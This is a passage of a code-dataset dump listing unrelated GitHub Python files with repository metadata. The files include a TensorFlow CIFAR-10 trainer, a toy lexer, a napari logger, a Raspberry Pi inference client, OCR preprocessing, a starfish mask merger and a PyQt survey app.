Otherwise the link will fail when trying to\n# generate an ELF hash type that the old linker does not recognize.\n# [Yaki 7/7/2009]\nlinkerFlags = [] \nshouldGenerateOnlyDefaultELFHash = os.environ.get('GR_GENERATE_ONLY_DEFAULT_ELF_HASH')\nif shouldGenerateOnlyDefaultELFHash is None:\n linkerFlags += [ \"-Wl,--hash-style=both,-lz,-lrt\" ]\n\n# Creating executable\nexe = env.Program(\n target = appName, \n source = sources,\n LINKFLAGS = linkerFlags)\n\n# Installing libraries\nlibInstall = env.Install( \n dir = env['CXL_Examples_dir'] + '/release', \n source = (exe))\n\nReturn('libInstall')\n","repo_name":"GPUOpen-Archive/CodeXL","sub_path":"CodeXL/Examples/AMDTTeaPot/AMDTTeaPot/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":989,"dataset":"github-code","pt":"37"} +{"seq_id":"75015668907","text":"import tensorflow as tf\nfrom convmnist import createWeight, createBias, createConv, createPool\nimport numpy as np\nimport time\nimport models.tutorials.image.cifar10.cifar10 \nimport models.tutorials.image.cifar10.cifar10_input\n\nMAX_STEPS = 3000\nBATCH_SIZE = 128\nLEARNING_RATE = 1e-3\nDATA_DIR = \"./cifar10_data/cifar-10-batches-bin\"\n\ndef variable_with_weight_loss(shape, stddev, wl):\n var = tf.Variable(tf.truncated_normal(shape, tf.float32, stddev = stddev))\n if wl is not None:\n weight_loss = tf.multiply(tf.nn.l2_loss(var), wl, name = \"weight_loss\")\n tf.add_to_collection('losses', weight_loss)\n return var\n\ndef loss(logits, labels):\n labels = tf.cast(labels, tf.int64)\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits = logits, labels = labels)\n cross_entropy_mean = tf.reduce_mean(cross_entropy)\n tf.add_to_collection('losses', cross_entropy_mean)\n return tf.add_n(tf.get_collection('losses'))\n\nwith tf.name_scope(\"placeholders\"):\n image_holder = tf.placeholder(tf.float32, [BATCH_SIZE, 24, 24, 3])\n label_holder = tf.placeholder(tf.float32, [BATCH_SIZE])\n\nwith tf.name_scope(\"first_conv\"):\n weight1 = variable_with_weight_loss([5, 5, 3, 64], stddev = 5e-2, wl = 0.0)\n kernel1 = tf.nn.conv2d(image_holder, weight1, [1, 1, 1, 1], 'SAME')\n bias1 = tf.Variable(tf.constant(0.0, shape = [64]))\n conv1 = tf.nn.relu(tf.nn.bias_add(kernel1, bias1))\n pool1 = tf.nn.max_pool(conv1, [1, 3, 3, 1], [1, 2, 2, 1], 'SAME')\n norm1 = tf.nn.lrn(pool1, 4, bias = 1.0, alpha = 0.001 / 9.0, beta = 0.75)\n\nwith tf.name_scope(\"second_conv\"):\n weight2 = variable_with_weight_loss([5, 5, 64, 64], stddev = 5e-2, wl = 0.0)\n kernel2 = tf.nn.conv2d(norm1, weight2, [1, 1, 1, 1], 'SAME')\n bias2 = tf.Variable(tf.constant(0.1, [64]))\n conv2 = tf.nn.relu(tf.nn.bias_add(kernel2, bias2))\n norm2 = tf.nn.lrn(conv2, 4, bias = 1.0, alpha = 0.001 / 9.0, beta = 0.75)\n pool2 = tf.nn.max_pool(norm2, ksize = [1, 3, 3, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n\nwith tf.name_scope(\"first_fully_connected\"):\n reshape = tf.reshape(pool2, [BATCH_SIZE, -1])\n dim = reshape.get_shape()[1].value\n weight3 = variable_with_weight_loss([dim, 384], stddev = 0.04, wl = 0.004)\n bias3 = tf.Variable(tf.constant(0.1, shape = [384]))\n local3 = tf.nn.relu(tf.matmul(reshape, weight3) + bias3)\n\nwith tf.name_scope(\"second_fully_connected\"):\n weight4 = variable_with_weight_loss([384, 192], stddev = 0.04, wl = 0.004)\n bias4 = tf.Variable(tf.constant(0.1, shape = [192]))\n local4 = tf.nn.relu(tf.matmul(local3, weight4) + bias4)\n\nwith tf.name_scope(\"third_fully_connected\"):\n weight5 = 
variable_with_weight_loss([192, 10], stddev = 1/192.0, wl = 0.0)\n bias5 = tf.Variable(tf.constant(0.0, shape = [10]))\n logits = tf.add(tf.matmul(local4, weight5) + bias5)\n\nwith tf.name_scope(\"loss\"):\n loss = loss(logits, label_holder)\n\nwith tf.name_scope(\"trianer\"):\n trainer = tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss)\n\ntop_k_op = tf.nn.in_top_k(logits, label_holder, 1)\n\nif __name__ == '__main__':\n cifar_10.maybe_download_extract()\n images_train, labels_train = cifar10_input.distorted_inputs(\n data_dir = DATA_DIR, batch_size = BATCH_SIZE)\n images_test, labels_test = cifar10_input.inputs(eval_data = True,\n data_dir = DATA_DIR,\n batch_size = BATCH_SIZE)\n sess = tf.InteractiveSession()\n tf.global_variables_initializer.run()\n tf.train.start_queue_runners()\n writer = tf.summary.FileWriter(\"./logs/convcifar10/\", sess.graph)\n for step in range(MAX_STEPS):\n start_time = time.time()\n image_batch, label_batch = sess.run([images_train, labels_train])\n _, loss_value = sess.run(trainer, loss,\n feed_dict = {image_holder: image_batch, label_holder: label_batch})\n duration = time.time() - start_time\n if step % 10 == 0:\n examples_per_sec = BATCH_SIZE / duration\n sec_per_batch = float(duration)\n\n print(\"loss: %f, examples/s: %f, s/batch:%f\" \\\n % (loss_value, examples_per_sec, sec_per_batch))\n \n num_examples = 10000\n import math\n num_iter = int(math.ceil(num_examples / BATCH_SIZE))\n true_count = 0\n total_sample_count = num_iter * BATCH_SIZE\n step = 0\n while step < num_iter:\n image_batch, label_batch = sess.run(images_test, labels_test)\n predictions = sess.run(top_k_op, \n feed_dict = {image_holder: image_batch, label_holder: label_batch})\n true_count = np.sum(predictions)\n step += 1\n \n precision = true_count / total_sample_count\n print(\"presition @ 1 = %.3f\" % precision)\n\n\n","repo_name":"chenlighten/ML","sub_path":"convcifar10.py","file_name":"convcifar10.py","file_ext":"py","file_size_in_byte":4780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20762112306","text":"def fcopy(fileName1,fileName2):\r\n fileIn=open(fileName1, 'r')\r\n fileOut=open(fileName2, 'w')\r\n for word in fileIn.readlines():\r\n if '//' not in word:\r\n fileOut.write(word)\r\n fileIn.close()\r\n fileOut.close()\r\nprint('==============The Input file=================')\r\nFile = open('input.txt')\r\nfilecontent = File.read()\r\nprint(filecontent)\r\nFile.close()\r\nprint('==============END =================\\n \\n')\r\nprint('==============The Output file=================')\r\nFile = open('output.txt')\r\nfilecontent = File.read()\r\nprint(filecontent)\r\nFile.close()\r\nprint('==============End=================\\n\\n')\r\n\r\nprint(\"Symbol\\t\\tToken\\t\\t\\tAttribute\")\r\nprint(\"======\\t\\t=====\\t\\t\\t==========\")\r\n\r\nfcopy('input.txt','output.txt')\r\n#open('output.txt')\r\n\r\n\r\n\r\nwith open('output.txt','r') as f:\r\n for line in f:\r\n for word in line.split():\r\n if word=='int' or word=='include'or word=='main'or word=='for' or word=='if' or word=='double' or word=='printf' or word=='scanf':\r\n\r\n print(word+' \\t\\t keyword')\r\n if word=='stdio.h' or word=='math.h'or word=='stdlib.h'or word=='string.h':\r\n print(word+' \\t\\t headerfile')\r\n if word=='i' or word=='j' or word=='sum1'or word=='sum2' or word=='d':\r\n print(word+' \\t\\t variable')\r\n \r\n\r\n\r\n\r\nFile = open('output.txt')\r\nfilecontent = File.read()\r\n\r\na=list(filecontent)\r\nfor i in range(len(a)):\r\n 
if a[i]=='+':\r\n fil=open('output.txt','w')\r\n fil.write(\" \"+a[i]+\"\\tarithmetic operator\\t plus\")\r\n \r\n if a[i]=='-':\r\n print( \" \"+a[i]+\"\\tarithmetic operator\\t Minus\")\r\n if a[i]=='*':\r\n print(\" \"+a[i]+\"\\tarithmetic operator\\t Multiplecation\")\r\n if a[i]=='/':\r\n print(\" \"+a[i]+\"\\tarithmetic operator\\t Divided\")\r\n if a[i]==';':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol\\t\\t Semicoma\")\r\n if a[i]==',':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol\\t\\t Coma\")\r\n if a[i]=='(':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol \\t Starting Openning parenteses\")\r\n if a[i]==')':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol \\t Closing parentheses\")\r\n if a[i]=='#':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol\\t\\t Hash\")\r\n if a[i]=='{':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol\\t\\t Opening Curly brace\")\r\n if a[i]=='}':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol\\t\\t Closing Curly Brace\")\r\n if a[i]=='[':\r\n print(\" \"+a[i]+\"\\tSpecial Operator\\t Starting Square Brace\")\r\n if a[i]==']':\r\n print(\" \"+a[i]+\"\\tSpecial Operator\\t Closing Square Brace\")\r\n if a[i]=='%':\r\n print(\" \"+a[i]+\"\\tUnary operator\\t\\t Modulus\")\r\n if a[i]=='&':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol\\t\\t Ampersand\\n\\n\")\r\n if type(a[i])=='class str':\r\n print(string)\r\nprint('\\n\\n\\t\\t==============End=================\\n\\n')\r\n","repo_name":"zh-cse18/Python-Practice-Code","sub_path":"twofile.py","file_name":"twofile.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72944635948","text":"import sys\nfrom pathlib import Path\nimport time\n\nfrom qtpy.QtWidgets import QMessageBox, QInputDialog\nfrom napari.qt.threading import thread_worker\n\n\ndef setup_logging():\n \"\"\"\n Sets up for print to write to the log file\n \"\"\"\n plugin_directory = Path(__file__).parent.parent.parent.absolute()\n print(plugin_directory)\n path = plugin_directory / \"hitl4trk.log\"\n file = open(path, \"w\")\n sys.stdout = file\n sys.stderr = file\n print(\"Logging initialized\")\n\n\ndef notify(text):\n \"\"\"\n Shows a notification dialog\n\n Parameters\n ----------\n text : str\n The text displayed as the notification\n \"\"\"\n msg = QMessageBox()\n msg.setWindowTitle(\"napari\")\n msg.setText(text)\n print(\"Notifying user: '{}'\".format(text))\n msg.exec()\n\n\n@thread_worker\ndef notify_with_delay(text):\n time.sleep(0.2)\n notify(text)\n\n\ndef choice_dialog(text, choices):\n \"\"\"\n Shows a dialog where the user has to make a decision\n\n Parameters\n ----------\n text : str\n The text displayed as the prompt for the decision\n choices : list of tuple or types of buttons\n Tuples of the potential choices, consisting of (\"button text\", \"button type\") or button types\n \"\"\"\n msg = QMessageBox()\n msg.setWindowTitle(\"napari\")\n msg.setText(text)\n for choice in choices:\n if type(choice) is tuple:\n msg.addButton(choice[0], choice[1])\n else:\n msg.addButton(choice)\n print(\"Prompting user: '{}'\".format(text))\n return msg.exec()\n\ndef layer_select(parent, layertype):\n title = \"Select Layer\"\n text = f\"Please select the layer that has the {layertype}\"\n items = []\n for layer in parent.viewer.layers:\n items.append(layer.name)\n return QInputDialog.getItem(parent, title, text, items, editable = 
False)\n","repo_name":"MMV-Lab/mmv-tracking-napari","sub_path":"src/mmv_tracking_napari/_logger.py","file_name":"_logger.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43373716903","text":"#!/usr/bin/env python3\nfrom socketIO_client_nexus import SocketIO, LoggingNamespace\nimport warnings\nimport os, time\nfrom mvnc import mvncapi as mvnc\nimport numpy\nimport cv2\nimport os, sys\nimport json\nimport picamera\nimport picamera.array\n\nwarnings.simplefilter(\"ignore\", DeprecationWarning)\n\n#define some global variables and load necessary data\n# Load graph\npath_to_networks = './Inception-v3/'\n#path_to_images = dir\ngraph_filename = 'graph'\nwith open(path_to_networks + graph_filename, mode='rb') as f:\n graphfile = f.read()\n\n# Load categories\ncategories = []\nwith open(path_to_networks + 'categories.txt', 'r') as f:\n for line in f:\n cat = line.split('\\n')[0]\n if cat != 'classes':\n categories.append(cat)\n f.close()\n #print('Number of categories:', len(categories))\n\n# Load dict\ndict = []\nwith open(path_to_networks + 'dict.txt', 'r') as f:\n for line in f:\n cat = line.split('\\n')[0]\n dict.append(cat)\n f.close()\n #print('Number of categories:', len(dict))\n\n#Load inputsize\nwith open(path_to_networks + 'inputsize.txt', 'r') as f:\n reqsize = int(f.readline().split('\\n')[0])\n\n# Load preprocessing data\nmean = 128\nstd = 1 / 128\n\ndevices = mvnc.EnumerateDevices()\nglobal camera\n\ndef set_default(obj):\n if isinstance(obj, set):\n return list(obj)\n raise TypeError\n\ndef on_connect():\n print('connect')\n\ndef on_disconnect():\n print('disconnect')\n\ndef on_reconnect():\n print('reconnect')\n\n\ndef load_devices():\n global devices\n global device\n global graphfile\n global graph\n global camera\n if len(devices) == 0:\n print('No devices found')\n quit()\n device = mvnc.Device(devices[0])\n device.OpenDevice()\n graph = device.AllocateGraph(graphfile)\n print('NCS device was opened.')\n #socketIO.emit('event_B')\n socketIO.emit('new message', 'NCS device was opened.')\n camera = picamera.PiCamera()\n camera.rotation = 180\n\ndef Capture():\n stream = picamera.array.PiRGBArray(camera)\n camera.capture(stream, format = 'bgr')\n frame = stream.array\n return frame\n\ndef ImageRead():\n return cv2.imread(\"./test3.jpg\")\n\ndef infer():\n global graph\n image = Capture()\n img = numpy.array(image).astype(numpy.float32)\n dx, dy, dz = img.shape\n delta = float(abs(dy - dx))\n if dx > dy: # crop the x dimension\n img = img[int(0.5 * delta):dx - int(0.5 * delta), 0:dy]\n else:\n img = img[0:dx, int(0.5 * delta):dy - int(0.5 * delta)]\n img = cv2.resize(img, (reqsize, reqsize))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n for i in range(3):\n img[:, :, i] = (img[:, :, i] - mean) * std\n graph.LoadTensor(img.astype(numpy.float16), 'user object')\n output, userobj = graph.GetResult()\n top_inds = output.argsort()[::-1][:5]\n #print(''.join(['*' for i in range(79)]))\n result = []\n for i in range(5):\n if output[top_inds[i]] <= 0.001 or categories[top_inds[i]] not in dict:\n break\n # print(top_inds[i], categories[top_inds[i]], output[top_inds[i]])\n print(categories[top_inds[i]])\n result.append(categories[top_inds[i]])\n socketIO.emit('new message', result)\n #print(''.join(['*' for i in range(79)]))\n\ndef exit():\n global device\n global camera\n camera.close()\n device.CloseDevice()\n print(\"NCS device is closed.\")\n socketIO.emit('new message', \"NCS 
device is closed.\")\n\n\n\n\nsocketIO = SocketIO('localhost', 3000, LoggingNamespace)\nsocketIO.on('connect', on_connect)\nsocketIO.on('disconnect', on_disconnect)\nsocketIO.on('reconnect', on_reconnect)\n\n\nwhile(1):\n\n socketIO.on('start', load_devices)\n # Listen\n socketIO.on('infer', infer)\n socketIO.wait(seconds=1)\n\n # Stop listening\n #socketIO.off('infer')\n #socketIO.emit('event_B')\n #socketIO.wait(seconds=1)\n\n # Listen only once\n socketIO.on('exit', exit)\n socketIO.wait(seconds=1)\n","repo_name":"WuXinyang2012/RaspberryPI_nodejs_socketIO_detector","sub_path":"client_sio.py","file_name":"client_sio.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1453047516","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: sabari\r\n\"\"\"\r\n\r\nimport cv2\r\nfrom skimage.filters import threshold_sauvola\r\nimport numpy as np\r\n\r\n\r\nclass preprocessing():\r\n\r\n def sauvola_thresholding(grayImage_,window_size=15):\r\n \r\n \"\"\"\"\r\n Sauvola thresholds are local thresholding techniques that are \r\n useful for images where the background is not uniform, especially for text recognition\r\n \r\n grayImage--- Input image should be in 2-Dimension Gray Scale format\r\n window_size --- It represents the filter window size \r\n \r\n \"\"\"\r\n thresh_sauvolavalue = threshold_sauvola(grayImage_, window_size=window_size)\r\n \r\n thresholdImage_=(grayImage_>thresh_sauvolavalue)\r\n \r\n return thresholdImage_\r\n \r\n \r\n def remove_Lines(binaryImage_,horz_size=12,vert_size=15):\r\n \"\"\"\r\n Removing the horizontal and vertical lines in the image\r\n \r\n binaryImage_--- Image should be in binray format\r\n horz_size -- It represents the Minimum size of horizantal line need to be removed from the image\r\n vert_size -- It represents the Minimum size of vertical line need to be removed from the image\r\n \r\n \"\"\"\r\n horz_size=round(binaryImage_.shape[0]*0.075)\r\n vert_size=round(binaryImage_.shape[1]*0.09)\r\n horizontal_kernel=np.ones((1,horz_size),np.uint8)\r\n vertical_kernel=np.ones((vert_size,1),np.uint8)\r\n hz_closing = cv2.morphologyEx(binaryImage_, cv2.MORPH_CLOSE, horizontal_kernel)\r\n ver_closing = cv2.morphologyEx(binaryImage_, cv2.MORPH_CLOSE, vertical_kernel)\r\n\r\n Lines = hz_closing&ver_closing\r\n LinesRemoved= binaryImage_| (~Lines)\r\n return np.uint8(LinesRemoved)\r\n\r\n \r\n \r\n \r\n \r\n\"\"\"\r\nthresholdImage=preprocessing.sauvola_thresholding(grayImage)\r\n\r\nremoveLines=preprocessing.remove_Lines(np.uint8(thresholdImage))\r\n\r\n\"\"\"\r\n\r\n ## remove lines ###\r\n\r\n\r\n","repo_name":"dsabarinathan/OpenDoc","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25652497240","text":"import spacy\r\nimport json\r\nnlp = spacy.load(\"en_core_web_sm\")\r\ntext = '''That day, Yakufu, a 43-year-old ethnic Uyghur, had been freed from a Chinese detention camp and allowed to return home to her three teenage children and aunt and uncle in Xinjiang, western China. 
It was the first time she'd seen her family in more than 16 months.\r\n\r\n'''\r\n\r\ndoc = nlp(text)\r\n\r\ntag = ['GPE','ORG','PERSON','PERCENT','NORP']\r\nres = {\"article\": text , \"answers\":{\"ans_detail\":[]}}\r\nfor ent in doc.ents:\r\n print(ent.text, ent.start_char, ent.end_char, ent.label_)\r\n if ent.label_ in tag:\r\n tmp = {\"tag\" : ent.text, \"start_at\" : ent.start_char, \"end_at\" : ent.end_char}\r\n res[\"answers\"][\"ans_detail\"].append(tmp)\r\n\r\nprint(json.dumps(res))","repo_name":"Minniemu/BERT-for-token-Classification","sub_path":"Spacy/spacy_test.py","file_name":"spacy_test.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43979469864","text":"# nubBy :: (a -> a -> Bool) -> [a] -> [a]\ndef nubBy(p, xs):\n def go(xs):\n if xs:\n x = xs[0]\n return [x] + go(\n list([y for y in xs[1:] if not p(x, y)])\n )\n else:\n return []\n return go(xs)\n","repo_name":"ethansaxenian/RosettaDecode","sub_path":"lang/Python/remove-duplicate-elements-8.py","file_name":"remove-duplicate-elements-8.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18663183163","text":"import unittest\nfrom src.day2.dive import Dive\n\nDIVE_INSTRUCTION = [['forward', 5], ['down', 5], ['forward', 8],\n ['up', 3], ['down', 8], ['forward', 2]]\n\n\nclass TestDive(unittest.TestCase):\n def test_should_return_horizontal_position_after_dive(self):\n horizontal_position = Dive.get_horizontal_position(DIVE_INSTRUCTION)\n self.assertEqual(horizontal_position, 15)\n\n def test_should_return_final_depth_after_dive(self):\n final_depth = Dive.get_final_depth(DIVE_INSTRUCTION)\n self.assertEqual(final_depth, 10)\n\n def test_should_return_final_depth_considering_aim_value(self):\n depth = Dive. \\\n get_horizontal_and_depth_position_with_aim(DIVE_INSTRUCTION)[1]\n self.assertEqual(depth, 60)\n","repo_name":"mram0s/adventOfCode2021","sub_path":"test/day2/testDive.py","file_name":"testDive.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18040749434","text":"from typing import Mapping, Optional, Sequence\n\nimport numpy as np\n\nfrom starfish.core.morphology.binary_mask import BinaryMaskCollection\nfrom starfish.core.morphology.util import _ticks_equal\nfrom starfish.core.types import ArrayLike, Axes, Coordinates, Number\nfrom ._base import MergeAlgorithm\n\n\nclass SimpleMerge(MergeAlgorithm):\n \"\"\"Merge multiple binary mask collections together. 
This implementation requires that all\n the binary mask collections have the same pixel and physical ticks.\"\"\"\n\n def run(\n self,\n binary_mask_collections: Sequence[BinaryMaskCollection],\n *args,\n **kwargs\n ) -> BinaryMaskCollection:\n \"\"\"\n Parameters\n ----------\n binary_mask_collections : Sequence[BinaryMaskCollection]\n A sequence of binary mask collections with identical pixel and physical ticks.\n\n Returns\n -------\n BinaryMaskCollection\n A binary mask collection with the input mask collections merged together.\n \"\"\"\n pixel_ticks: Optional[Mapping[Axes, ArrayLike[int]]] = None\n physical_ticks: Optional[Mapping[Coordinates, ArrayLike[Number]]] = None\n\n # validate that they have the same pixel/physical ticks.\n for binary_mask_collection in binary_mask_collections:\n pixel_ticks = pixel_ticks or binary_mask_collection._pixel_ticks\n physical_ticks = physical_ticks or binary_mask_collection._physical_ticks\n\n if not _ticks_equal(pixel_ticks, binary_mask_collection._pixel_ticks):\n raise ValueError(\"not all masks have the same pixel ticks\")\n if not _ticks_equal(physical_ticks, binary_mask_collection._physical_ticks):\n raise ValueError(\"not all masks have the same physical ticks\")\n\n # gather up all the uncropped masks.\n all_uncropped_masks = [\n np.asarray(binary_mask_collection.uncropped_mask(ix))\n for binary_mask_collection in binary_mask_collections\n for ix in range(len(binary_mask_collection))\n ]\n\n assert pixel_ticks is not None\n assert physical_ticks is not None\n\n return BinaryMaskCollection.from_binary_arrays_and_ticks(\n all_uncropped_masks,\n pixel_ticks,\n physical_ticks,\n None,\n )\n","repo_name":"spacetx/starfish","sub_path":"starfish/core/morphology/Merge/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"6593779996","text":"from PyQt6.QtWidgets import *\r\nfrom PyQt6.QtCore import Qt\r\nclass TestWindow(QMainWindow):\r\n spisoc = []\r\n def __init__(self):\r\n super().__init__()\r\n self.setFixedSize(500,200)\r\n\r\n self.name = QLabel(\"Введите свое Имя и Фамилию\")\r\n self.edit = QLineEdit()\r\n self.course = QLabel(\"Введите Группу\")\r\n self.edit1 = QLineEdit()\r\n box = QVBoxLayout()\r\n wid = QWidget()\r\n wid.setLayout(box)\r\n box.addWidget(self.name)\r\n box.addWidget(self.edit)\r\n box.addWidget(self.course)\r\n\r\n box.addWidget(self.edit1)\r\n\r\n lbl1 = QLabel(\"Какой тип автомобиля вы предпочитаете?\")\r\n self.rb1 = QRadioButton(text=\"Седан\")\r\n self.rb2 = QRadioButton(text=\"Хэтчбек\")\r\n self.rb3 = QRadioButton(text=\"Внедорожник\")\r\n self.rb4 = QRadioButton(text=\"Купе\")\r\n vbox = QVBoxLayout()\r\n widget = QWidget()\r\n widget.setLayout(vbox)\r\n vbox.addWidget(lbl1)\r\n vbox.addWidget(self.rb1)\r\n vbox.addWidget(self.rb2)\r\n vbox.addWidget(self.rb3)\r\n vbox.addWidget(self.rb4)\r\n\r\n lbl2 = QLabel(\"Какой бюджет у вас на автомобиль?\")\r\n self.rb1_1 = QRadioButton(text=\"До 300 000 руб\")\r\n self.rb2_1 = QRadioButton(text=\"300 000 руб - 700 000 руб\")\r\n self.rb3_1 = QRadioButton(text=\"700 000 руб - 1 000 000 руб\")\r\n self.rb4_1 = QRadioButton(text=\"Более 1 000 000 руб\")\r\n vbox_2 = QVBoxLayout()\r\n widget2 = QWidget()\r\n widget2.setLayout(vbox_2)\r\n vbox_2.addWidget(lbl2)\r\n vbox_2.addWidget(self.rb1_1)\r\n vbox_2.addWidget(self.rb2_1)\r\n vbox_2.addWidget(self.rb3_1)\r\n vbox_2.addWidget(self.rb4_1)\r\n\r\n\r\n lbl3 = QLabel(\"Какие опции вам 
необходимы?\")\r\n self.rb1_2 = QRadioButton(text=\"Кондиционер\")\r\n self.rb2_2 = QRadioButton(text=\"Навигационная система\")\r\n self.rb3_2 = QRadioButton(text=\"Камера заднего вида\")\r\n self.rb4_2 = QRadioButton(text= \"Круиз-контроль\")\r\n vbox_3 = QVBoxLayout()\r\n widget3 = QWidget()\r\n widget3.setLayout(vbox_3)\r\n vbox_3.addWidget(lbl3)\r\n vbox_3.addWidget(self.rb1_2)\r\n vbox_3.addWidget(self.rb2_2)\r\n vbox_3.addWidget(self.rb3_2)\r\n vbox_3.addWidget(self.rb4_2)\r\n\r\n lbl7 = QLabel(\"Результаты теста:\")\r\n self.v6 = QLabel(self.rb1_2.text())\r\n self.v2 = QLabel()\r\n self.v3 = QLabel()\r\n self.v4 = QLabel()\r\n self.v5 = QLabel()\r\n self.res = QLabel()\r\n vbox7 = QVBoxLayout()\r\n widget7 = QWidget()\r\n widget7.setLayout(vbox7)\r\n vbox7.addWidget(lbl7)\r\n vbox7.addWidget(self.v6)\r\n vbox7.addWidget(self.v2)\r\n vbox7.addWidget(self.v3)\r\n vbox7.addWidget(self.v4)\r\n vbox7.addWidget(self.v5)\r\n vbox7.addWidget(self.res)\r\n btn_save = QPushButton(\"Сохранить\")\r\n btn_save.clicked.connect(self.save)\r\n vbox7.addWidget(btn_save)\r\n\r\n\r\n pagelayout = QVBoxLayout()\r\n self.button_layout = QHBoxLayout()\r\n self.stacklayout = QStackedLayout()\r\n\r\n pagelayout.addLayout(self.stacklayout)\r\n pagelayout.addLayout(self.button_layout)\r\n\r\n self.btnb = QPushButton(\"back\")\r\n self.btn = QPushButton(\"next\")\r\n\r\n self.btnb.clicked.connect(self.activate_tab_b)\r\n self.btn.clicked.connect(self.activate_tab_v)\r\n\r\n self.stacklayout.addWidget(wid)\r\n self.button_layout.addWidget(self.btnb)\r\n self.button_layout.addWidget(self.btn)\r\n\r\n self.stacklayout.addWidget(widget)\r\n\r\n self.stacklayout.addWidget(widget2)\r\n\r\n self.stacklayout.addWidget(widget3)\r\n\r\n # self.stacklayout.addWidget(widget6)\r\n\r\n self.stacklayout.addWidget(widget7)\r\n\r\n\r\n\r\n widget = QWidget()\r\n widget.setLayout(pagelayout)\r\n self.setCentralWidget(widget)\r\n\r\n with open(\"style.css\", \"r\") as css:\r\n self.setStyleSheet(css.read())\r\n\r\n def activate_tab_v(self):\r\n self.stacklayout.setCurrentIndex(self.stacklayout.currentIndex()+1)\r\n\r\n if self.rb1.isChecked():\r\n self.spisoc.append(self.rb1.text())\r\n\r\n if self.rb2.isChecked():\r\n self.spisoc.append(self.rb2.text())\r\n \r\n if self.rb3.isChecked():\r\n self.spisoc.append(self.rb3.text())\r\n\r\n if self.rb4.isChecked():\r\n self.spisoc.append(self.rb4.text())\r\n\r\n if self.rb1_1.isChecked():\r\n self.spisoc.append(self.rb1_1.text())\r\n\r\n if self.rb2_1.isChecked():\r\n self.spisoc.append(self.rb2_1.text())\r\n \r\n if self.rb3_1.isChecked():\r\n self.spisoc.append(self.rb3_1.text())\r\n\r\n if self.rb4_1.isChecked():\r\n self.spisoc.append(self.rb4_1.text())\r\n\r\n if self.rb1_2.isChecked():\r\n self.spisoc.append(self.rb1_2.text())\r\n\r\n if self.rb2_2.isChecked():\r\n self.spisoc.append(self.rb2_2.text())\r\n\r\n if self.rb3_2.isChecked():\r\n self.spisoc.append(self.rb3_2.text())\r\n\r\n if self.rb4_2.isChecked():\r\n self.spisoc.append(self.rb4_2.text())\r\n\r\n def activate_tab_b(self):\r\n self.stacklayout.setCurrentIndex(self.stacklayout.currentIndex()-1)\r\n\r\n def result(self):\r\n result = \"Результаты:\\n\"\r\n for i in range(self.activate_tab_v):\r\n result += f\"Вопрос {i+1}: {self.spisoc[i]['question']}\\n\"\r\n result += f\"Ответ: {self.spisoc[i]}\\n\\n\"\r\n QMessageBox.information(self, \"Результаты\", result)\r\n\r\n # self.setFixedSize(500, 300)\r\n # self.res.setText(f\"Ваш результат:{self.e}\")\r\n def save(self):\r\n info = f\"Фамилия и Имя:{self.edit.text()} 
\\n\"\r\n cour = f\"Группа:{self.edit1.text()} \\n\"\r\n txt = f\"Ваш результат:{self.v6.text()} \\n\"\r\n txt1 = f\"Ваш результат:{self.v2.text()} \\n\"\r\n txt2 = f\"Ваш результат:{self.v3.text()} \\n\"\r\n txt5 = f\"Ваш результат:{self.e} \\n\"\r\n\r\n with open(\"results.txt\", \"w\", encoding=\"utf-8\") as f:\r\n f.write(info)\r\n f.write(cour)\r\n f.write(txt)\r\n f.write(txt1)\r\n f.write(txt2)\r\n f.write(txt5)\r\n","repo_name":"victorkluev5/practic","sub_path":"window/yjdsq afqk/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":6579,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15837733658","text":"class ListNode:\n def __init__(self, data=0, next=None):\n self.data = data\n self.next = next\n\n\ndef print_linked_list_in_reverse(head):\n nodes = []\n while head:\n nodes.append(head.data)\n head = head.next\n while nodes:\n print(nodes.pop())\n\n","repo_name":"michaelmontelli/EPIJudge","sub_path":"epi_judge_python/completed/chapter8-stacks_and_queues/8.0/print_linked_list_in_reverse.py","file_name":"print_linked_list_in_reverse.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"35448689171","text":"'''JUST AN EXAMPLE OF HOW TO SHOW DIFFERENT CURSORS!!'''\n\nfrom tkinter import *\nroot=Tk()\ncursors =[\n \"arrow\",\n \"circle\",\n \"clock\",\n \"cross\",\n \"dotbox\",\n \"exchange\",\n \"fleur\",\n \"heart\",\n \"man\",\n \"mouse\",\n \"pirate\",\n 